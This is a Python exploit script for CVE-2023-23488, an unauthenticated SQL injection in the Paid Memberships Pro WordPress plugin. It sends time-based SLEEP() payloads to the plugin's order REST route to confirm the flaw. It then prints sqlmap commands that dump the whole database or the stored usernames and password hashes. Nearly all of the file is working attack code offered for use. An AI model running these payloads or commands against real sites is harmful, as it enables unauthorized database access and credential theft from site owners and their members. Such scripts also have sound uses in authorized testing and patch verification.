
#!/usr/bin/env python
# Exploit Title: Paid Memberships Pro v2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection
# Exploit Author: r3nt0n
# CVE: CVE-2023-23488
# Date: 2023/01/24
# Vulnerability discovered by Joshua Martinelle
# Vendor Homepage: https://www.paidmembershipspro.com
# Software Link: https://downloads.wordpress.org/plugin/paid-memberships-pro.2.9.7.zip
# Advisory: https://github.com/advisories/GHSA-pppw-hpjp-v2p9
# Version: < 2.9.8
# Tested on: Debian 11 - WordPress 6.1.1 - Paid Memberships Pro 2.9.7
#
# Running this script against a WordPress instance with the Paid Memberships Pro plugin
# tells you whether the target is vulnerable.
# Because the SQL injection technique required to exploit it is time-based blind, the
# script does not try to exploit the vulnerability directly; instead it generates the
# appropriate sqlmap command to dump the whole database (probably very time-consuming)
# or specific chosen data such as usernames and passwords.
# Note: the vulnerability check is timing-based, so a slow or jittery network can skew
# the result; re-run the check (or confirm with sqlmap) before drawing conclusions.
#
# Usage example: python3 CVE-2023-23488.py http://127.0.0.1/wordpress
import sys
import requests
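def get_request(target_url, delay="1"):
    """Send one time-based blind SQLi probe and return its round-trip time in seconds.

    The probe targets the plugin's REST route ``/pmpro/v1/order`` (selected through the
    ``rest_route`` query parameter) with a ``code`` value that closes the string literal
    and appends ``SLEEP(delay)``.  On a vulnerable target the response is delayed by
    roughly ``delay`` seconds; on a patched one it returns promptly.

    Args:
        target_url: Base URL of the WordPress install, e.g. ``http://host/wordpress``.
        delay: Seconds passed to ``SLEEP()`` inside the injected query (str or int).

    Returns:
        Elapsed seconds for the request, as measured by ``requests`` (``response.elapsed``).

    Raises:
        requests.RequestException: on connection errors or when the request exceeds the
            timeout (``delay`` + 15 seconds).
    """
    payload = "a' OR (SELECT 1 FROM (SELECT(SLEEP(" + str(delay) + ")))a)-- -"
    data = {'rest_route': '/pmpro/v1/order', 'code': payload}
    # Always bound the wait: the SLEEP() delay is expected, but a hung or
    # rate-limiting target must not stall the scan forever (the original call had
    # no timeout at all).
    timeout = float(delay) + 15
    response = requests.get(target_url, params=data, timeout=timeout)
    return response.elapsed.total_seconds()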
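def main():
    """Check a WordPress target for CVE-2023-23488 and print ready-made sqlmap commands.

    Reads the target base URL from ``sys.argv[1]``.

    Exit codes: 0 target looks vulnerable, 1 usage error, 2 target unreachable or
    stopped responding, 3 target does not look vulnerable.
    """
    red, green, reset = u'\033[91m', u'\033[92m', u'\033[0m'

    print('Paid Memberships Pro < 2.9.8 (WordPress Plugin) - Unauthenticated SQL Injection\n')

    if len(sys.argv) != 2:
        print('Usage: {} <target_url>'.format("python3 CVE-2023-23488.py"))
        print('Example: {} http://127.0.0.1/wordpress'.format("python3 CVE-2023-23488.py"))
        sys.exit(1)

    target_url = sys.argv[1]

    print('[-] Testing if the target is vulnerable...')
    try:
        requests.get(target_url, timeout=15)
    except requests.RequestException:
        # Narrow except: a bare `except:` would also swallow KeyboardInterrupt/SystemExit.
        print('{}[!] ERROR: Target is unreachable{}'.format(red, reset))
        sys.exit(2)

    # Two probes with different SLEEP() values.  Declare the target vulnerable only when
    # (most of) the extra delay actually shows up in the second response; merely
    # observing "second slower than first" is satisfied by ordinary network jitter and
    # produced false positives.
    short_delay, long_delay = 1, 3
    try:
        short_elapsed = get_request(target_url, str(short_delay))
        long_elapsed = get_request(target_url, str(long_delay))
    except requests.RequestException:
        print('{}[!] ERROR: Target stopped responding during the probe{}'.format(red, reset))
        sys.exit(2)

    # Allow 20% slack for measurement noise on the expected 2-second difference.
    if long_elapsed - short_elapsed < (long_delay - short_delay) * 0.8:
        print('{}[!] The target does not seem vulnerable{}'.format(red, reset))
        sys.exit(3)

    print('\n{}[*] The target is vulnerable{}'.format(green, reset))

    # Time-based blind only (--technique=T); the other sqlmap techniques do not apply
    # here and --skip-heuristics avoids wasting time on detection payloads.
    base_cmd = ('sqlmap -u "{}/?rest_route=/pmpro/v1/order&code=a" -p code '
                '--skip-heuristics --technique=T --dbms=mysql --batch --dump').format(target_url)

    print('\n[+] You can dump the whole WordPress database with:')
    print(base_cmd)
    print('\n[+] To dump data from specific tables:')
    print(base_cmd + ' -T wp_users')
    print('\n[+] To dump only WordPress usernames and passwords columns (you should check if users table have the default name):')
    print(base_cmd + ' -T wp_users -C user_login,user_pass')
    sys.exit(0)


if __name__ == "__main__":
    main()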